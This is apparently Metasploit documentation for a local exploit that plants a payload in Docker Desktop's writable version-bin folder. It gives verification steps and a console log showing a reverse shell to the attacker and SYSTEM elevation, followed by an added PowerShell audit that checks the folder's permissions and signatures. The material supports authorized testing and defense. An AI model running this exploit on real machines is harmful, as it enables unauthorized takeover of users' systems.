GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/windows/local/docker_credential_wincred.md

Vulnerable Application

Docker Desktop Community Edition before 2.1.0.1. Installer: https://download.docker.com/win/stable/28905/Docker%20for%20Windows%20Installer.exe

Verification Steps

  1. Install Docker Desktop Community Edition before 2.1.0.1

  2. Start msfconsole

  3. Get a session with basic privileges

  4. Do: use exploit/windows/local/docker_credential_wincred

  5. Do: set SESSION <sess_no>

  6. Do: run

  7. Using an administrator cmd shell on the target, run docker login

  8. You should get a shell you can elevate with getsystem.

Scenarios

Tested on Docker Community Edition 2.0.0.0 running on Windows 10 x64 Release 1803

```
msf5 exploit(windows/local/docker_credential_wincred) > show options

Module options (exploit/windows/local/docker_credential_wincred):

   Name         Current Setting                            Required  Description
   ----         ---------------                            --------  -----------
   PROGRAMDATA  C:\ProgramData\DockerDesktop\version-bin\  no        Path to docker version-bin.
   SESSION                                                 yes       The session to run this module on.


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(windows/local/docker_credential_wincred) > set session 1
session => 1
msf5 exploit(windows/local/docker_credential_wincred) > check

[*] Docker version 18.09.0, build 4d60db4
[*] The target appears to be vulnerable.
msf5 exploit(windows/local/docker_credential_wincred) > run

[*] Started reverse TCP handler on 192.168.135.168:4444
[*] Docker version 18.09.0, build 4d60db4
[*] UAC is Enabled, checking level...
[*] Checking admin status...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] payload_pathname = C:\ProgramData\DockerDesktop\version-bin\\docker-credential-wincred.exe
[*] Making Payload
[*] Uploading Payload to C:\ProgramData\DockerDesktop\version-bin\\docker-credential-wincred.exe
[*] Payload Upload Complete
[*] Waiting for user to attempt to login
[*] Sending stage (180291 bytes) to 192.168.132.125
[*] Meterpreter session 3 opened (192.168.135.168:4444 -> 192.168.132.125:49766) at 2020-04-15 16:32:09 -0500

meterpreter > sysinfo
Computer        : DESKTOP-D1E425Q
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: DESKTOP-D1E425Q\msfuser
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
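
A defender-side audit of the directory the session above writes to, as an added example that is not part of the Metasploit documentation or Docker's tooling. It lists write access granted to unprivileged principals on the version-bin directory (default path taken from the PROGRAMDATA option) and reports the owner and Authenticode status of every executable found there. The function name `Test-DockerVersionBin` and the set of well-known SIDs treated as unprivileged are assumptions of this example.

```powershell
# Added example: audit the Docker Desktop version-bin directory.
function Test-DockerVersionBin {
    param(
        # Default taken from the module's PROGRAMDATA option.
        [string]$Path = 'C:\ProgramData\DockerDesktop\version-bin'
    )
    if (-not (Test-Path -LiteralPath $Path -PathType Container)) { return }

    # Assumption: well-known SIDs that include unprivileged local users.
    $lowPriv = @{
        'S-1-1-0'      = 'Everyone'
        'S-1-5-11'     = 'Authenticated Users'
        'S-1-5-4'      = 'INTERACTIVE'
        'S-1-5-32-545' = 'BUILTIN\Users'
    }
    # Rights that allow creating or replacing a file, plus the raw
    # GENERIC_WRITE (0x40000000) and GENERIC_ALL (0x10000000) bits that
    # can appear on inherit-only entries.
    $rights    = [System.Security.AccessControl.FileSystemRights]'CreateFiles, AppendData, Delete, DeleteSubdirectoriesAndFiles, ChangePermissions, TakeOwnership'
    $writeBits = [int]$rights -bor 0x40000000 -bor 0x10000000

    # Ask for SIDs rather than names so the check is locale-independent.
    $sidType = [System.Security.Principal.SecurityIdentifier]
    foreach ($ace in (Get-Acl -LiteralPath $Path).GetAccessRules($true, $true, $sidType)) {
        $sid = $ace.IdentityReference.Value
        if ($ace.AccessControlType -eq 'Allow' -and $lowPriv.ContainsKey($sid) -and
            ([int]$ace.FileSystemRights -band $writeBits)) {
            [pscustomobject]@{
                Finding = 'WritableByLowPrivilege'
                Item    = $Path
                Detail  = '{0} ({1}): {2}' -f $lowPriv[$sid], $sid, $ace.FileSystemRights
            }
        }
    }

    # Report each executable with owner, signature status and timestamp for review.
    foreach ($exe in Get-ChildItem -LiteralPath $Path -Filter '*.exe' -File) {
        $sig = Get-AuthenticodeSignature -FilePath $exe.FullName
        [pscustomobject]@{
            Finding = if ($sig.Status -eq 'Valid') { 'SignedExecutable' } else { 'UnsignedOrInvalidExecutable' }
            Item    = $exe.FullName
            Detail  = 'owner={0}; signature={1}; modified={2:u}' -f (Get-Acl -LiteralPath $exe.FullName).Owner, $sig.Status, $exe.LastWriteTimeUtc
        }
    }
}

Test-DockerVersionBin | Format-Table -AutoSize -Wrap
```

A `WritableByLowPrivilege` row together with an `UnsignedOrInvalidExecutable` row for `docker-credential-wincred.exe` matches the state the session output above leaves behind.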